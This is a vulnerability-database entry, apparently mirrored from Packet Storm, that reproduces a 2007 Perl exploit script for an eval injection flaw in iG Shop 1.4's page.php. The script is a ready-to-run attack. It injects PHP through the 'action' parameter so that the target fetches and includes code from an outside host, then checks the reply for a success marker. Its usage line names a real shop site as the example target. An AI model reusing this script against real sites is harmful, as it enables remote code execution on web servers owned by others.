Lucene search

igshop14-eval.txt

🗓️ 20 Jun 2007 00:00:00Reported by IFXType

packetstorm🔗 packetstormsecurity.com👁 22 Views

iG Shop 1.4 eval Inclusion Vulnerability found by IFX #nyubicrew on page.ph

`#!/usr/bin/perl -w  
use LWP::UserAgent;  
####################################################################  
#iG Shop 1.4 eval Inclusion Vulnerability  
#found by IFX #nyubicrew  
#Vulnerability on page.php  
#if (!$action)   
# $action = "make";  
#// here the function will be called.  
#eval ("page_$action();");  
####################################################################  
die "Example: perl $0 http://www.planetgolfuk.co.uk/shop\n" unless @ARGV;  
  
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";  
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');  
$url = $ARGV[0] . "/page.php?action=|include(\$_GET\[cok\]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?";  
  
$res = $b->request(HTTP::Request->new(GET=>$url));  
$respone = $res->content;  
  
if ($respone =~ /nyelipin file ;P/i){  
print "\nTembus...\n";  
print "\n$url\n";  
}  
else{  
print "\nGagal cok...\n";  
}  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

20 Jun 2007 00:00Current

7.4High risk

Vulners AI Score7.4

vulnerability ig shop 1.4 eval inclusion ifx #nyubicrew page.php lwp::useragent http::request